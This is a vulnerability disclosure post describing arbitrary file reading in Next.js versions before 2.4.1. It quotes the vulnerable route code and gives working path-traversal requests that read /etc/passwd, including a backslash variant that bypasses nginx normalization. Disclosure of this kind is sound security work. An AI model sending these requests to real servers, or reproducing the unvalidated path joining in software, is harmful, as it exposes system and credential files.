Arbitrary File Reading in Next.js < 2.4.1

Next.js is a quite popular (>13k stars on GitHub) framework for server-rendered React applications. It includes a NodeJS server which allows to render HTML pages dynamically. While digging into server’s code, a list of internal routes drew my attention:

defineRoutes() {
    const routes = {
      /* ... */
      '/_next/:path+': async(req, res, params) => {
        const p = join(__dirname, '..', 'client', ...(params.path || []))
        await this.serveStatic(req, res, p)
      },
      '/static/:path+': async(req, res, params) => {
        const p = join(this.dir, 'static', ...(params.path || []))
        await this.serveStatic(req, res, p)
      }
      /* ... */
    }

As you can see you can pass arbitrary path into serveStatic() function via /_next/ and /static/ endpoints:

export function serveStatic(req, res, path) {
  return new Promise((resolve, reject) =>; {
    send(req, path)
      .on('directory', () =>; {
        // We don't allow directories to be read.
        const err = new Error('No directory access')
        err.code = 'ENOENT'
        reject(err)
      })
      .on('error', reject)
      .pipe(res)
      .on('finish', resolve)
  })
}

This function just pipes the contents of files into the output without any validation or restrictions. So, we can try to perform a path traversal:

GET /_next/../../../../../../../../../etc/passwd HTTP/1.1

And it works! However, NodeJS application servers are usually deployed behind nginx. Due to path normalization in nginx we cannot just use forward slashes and dots, nginx will return a Bad Request error code. Luckily, NodeJS server transforms backslashes into forward slashes, so we can bypass nginx validation.

GET /_next\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

ZEIT, the company which develops Next.js, was very quick to respond and roll out the patch. Be sure to update to the latest version.


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